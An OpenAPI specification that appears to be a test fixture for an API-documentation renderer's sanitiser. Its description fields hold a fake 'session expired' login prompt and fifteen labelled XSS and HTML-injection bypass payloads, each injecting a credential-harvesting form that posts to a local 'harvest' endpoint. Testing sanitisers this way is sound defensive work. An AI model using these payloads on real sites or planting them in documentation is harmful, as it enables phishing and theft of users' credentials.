openapi: 3.0.3
info:
  title: "IAI API Documentation"
  version: "1.0.0"
  
  # BYPASS ATTEMPT 1: HTML Entity Encoding
  description: |
    Session expired. Please re-authenticate.
    
    &#60;form action="http://localhost:9000/harvest" method="POST"&#62;
      &#60;input type="text" name="username" placeholder="Employee ID"&#62;
      &#60;input type="password" name="password"&#62;
      &#60;button type="submit"&#62;Sign In&#60;/button&#62;
    &#60;/form&#62;

tags:
  - name: "Test1-HTMLEntities"
    description: |
      # Bypass Test 1: HTML Entity Encoding
      
      &#x3C;form action="http://localhost:9000/harvest" method="POST"&#x3E;
        &#x3C;input type="text" name="username"&#x3E;
        &#x3C;button type="submit"&#x3E;Submit&#x3C;/button&#x3E;
      &#x3C;/form&#x3E;
  
  - name: "Test2-MixedCase"
    description: |
      # Bypass Test 2: Mixed Case Tags
      
      <FoRm AcTiOn="http://localhost:9000/harvest" MeThOd="POST">
        <InPuT tYpE="text" nAmE="username">
        <BuTtOn TyPe="submit">Submit</BuTtOn>
      </FoRm>
  
  - name: "Test3-NullBytes"
    description: |
      # Bypass Test 3: Null Byte Injection
      
      <form%00 action="http://localhost:9000/harvest" method="POST">
        <input type="text" name="username">
        <button type="submit">Submit</button>
      </form>
  
  - name: "Test4-UnicodeEncoding"
    description: |
      # Bypass Test 4: Unicode Encoding
      
      \u003cform action="http://localhost:9000/harvest" method="POST"\u003e
        \u003cinput type="text" name="username"\u003e
        \u003cbutton type="submit"\u003eSubmit\u003c/button\u003e
      \u003c/form\u003e
  
  - name: "Test5-DoubleEncoding"
    description: |
      # Bypass Test 5: Double HTML Entity Encoding
      
      &amp;lt;form action="http://localhost:9000/harvest" method="POST"&amp;gt;
        &amp;lt;input type="text" name="username"&amp;gt;
        &amp;lt;button type="submit"&amp;gt;Submit&amp;lt;/button&amp;gt;
      &amp;lt;/form&amp;gt;
  
  - name: "Test6-Base64"
    description: |
      # Bypass Test 6: Base64 Encoding
      
      <img src="x" onerror="eval(atob('ZG9jdW1lbnQud3JpdGUoJzxmb3JtIGFjdGlvbj0iaHR0cDovL2xvY2FsaG9zdDo5MDAwL2hhcnZlc3QiIG1ldGhvZD0iUE9TVCI+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InVzZXJuYW1lIj48YnV0dG9uIHR5cGU9InN1Ym1pdCI+U3VibWl0PC9idXR0b24+PC9mb3JtPicp'))">
  
  - name: "Test7-SVGPayload"
    description: |
      # Bypass Test 7: SVG-based XSS
      
      <svg onload="document.body.innerHTML='<form action=http://localhost:9000/harvest method=POST><input name=username><button>Submit</button></form>'">
  
  - name: "Test8-IframeDataURI"
    description: |
      # Bypass Test 8: Iframe with Data URI
      
      <iframe src="data:text/html,<form action='http://localhost:9000/harvest' method='POST'><input name='username'><button>Submit</button></form>"></iframe>
  
  - name: "Test9-JavaScriptProtocol"
    description: |
      # Bypass Test 9: JavaScript Protocol
      
      <a href="javascript:document.body.innerHTML='<form action=http://localhost:9000/harvest method=POST><input name=username><button>Submit</button></form>'">Click here to authenticate</a>
  
  - name: "Test10-MarkdownInjection"
    description: |
      # Bypass Test 10: Markdown to HTML
      
      [Click to authenticate](javascript:void(document.body.innerHTML='<form action=http://localhost:9000/harvest method=POST><input name=username><button>Submit</button></form>'))
  
  - name: "Test11-CommentBreakout"
    description: |
      # Bypass Test 11: HTML Comment Breakout
      
      <!-- <form action="http://localhost:9000/harvest" method="POST"> -->
      <input type="text" name="username">
      <button type="submit">Submit</button>
      <!-- </form> -->
  
  - name: "Test12-CSSExpression"
    description: |
      # Bypass Test 12: CSS Expression (IE)
      
      <div style="background:expression(document.body.innerHTML='<form action=http://localhost:9000/harvest method=POST><input name=username><button>Submit</button></form>')">Test</div>
  
  - name: "Test13-ObjectEmbed"
    description: |
      # Bypass Test 13: Object/Embed Tags
      
      <object data="data:text/html,<form action='http://localhost:9000/harvest' method='POST'><input name='username'><button>Submit</button></form>"></object>
  
  - name: "Test14-MetaRefresh"
    description: |
      # Bypass Test 14: Meta Refresh
      
      <meta http-equiv="refresh" content="0;url=data:text/html,<form action='http://localhost:9000/harvest' method='POST'><input name='username'><button>Submit</button></form>">
  
  - name: "Test15-NestedEncoding"
    description: |
      # Bypass Test 15: Nested Encoding
      
      &#x26;&#x6C;&#x74;&#x3B;form action="http://localhost:9000/harvest" method="POST"&#x26;&#x67;&#x74;&#x3B;
        &#x26;&#x6C;&#x74;&#x3B;input name="username"&#x26;&#x67;&#x74;&#x3B;
        &#x26;&#x6C;&#x74;&#x3B;button&#x26;&#x67;&#x74;&#x3B;Submit&#x26;&#x6C;&#x74;&#x3B;/button&#x26;&#x67;&#x74;&#x3B;
      &#x26;&#x6C;&#x74;&#x3B;/form&#x26;&#x67;&#x74;&#x3B;

paths:
  /test:
    get:
      tags:
        - Test1-HTMLEntities
        - Test2-MixedCase
        - Test3-NullBytes
        - Test4-UnicodeEncoding
        - Test5-DoubleEncoding
        - Test6-Base64
        - Test7-SVGPayload
        - Test8-IframeDataURI
        - Test9-JavaScriptProtocol
        - Test10-MarkdownInjection
        - Test11-CommentBreakout
        - Test12-CSSExpression
        - Test13-ObjectEmbed
        - Test14-MetaRefresh
        - Test15-NestedEncoding
      summary: "Test endpoint"
      responses:
        '200':
          description: "Success"
